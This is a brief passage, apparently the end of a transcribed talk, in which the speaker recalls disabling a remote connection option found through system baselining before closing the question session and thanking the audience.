little option there for like this remote connection or whatever. So we disabled it. We wouldn't have known that if we didn't do the baselining. Any other questions? All right, guys. Thanks to you very much. I really appreciate it.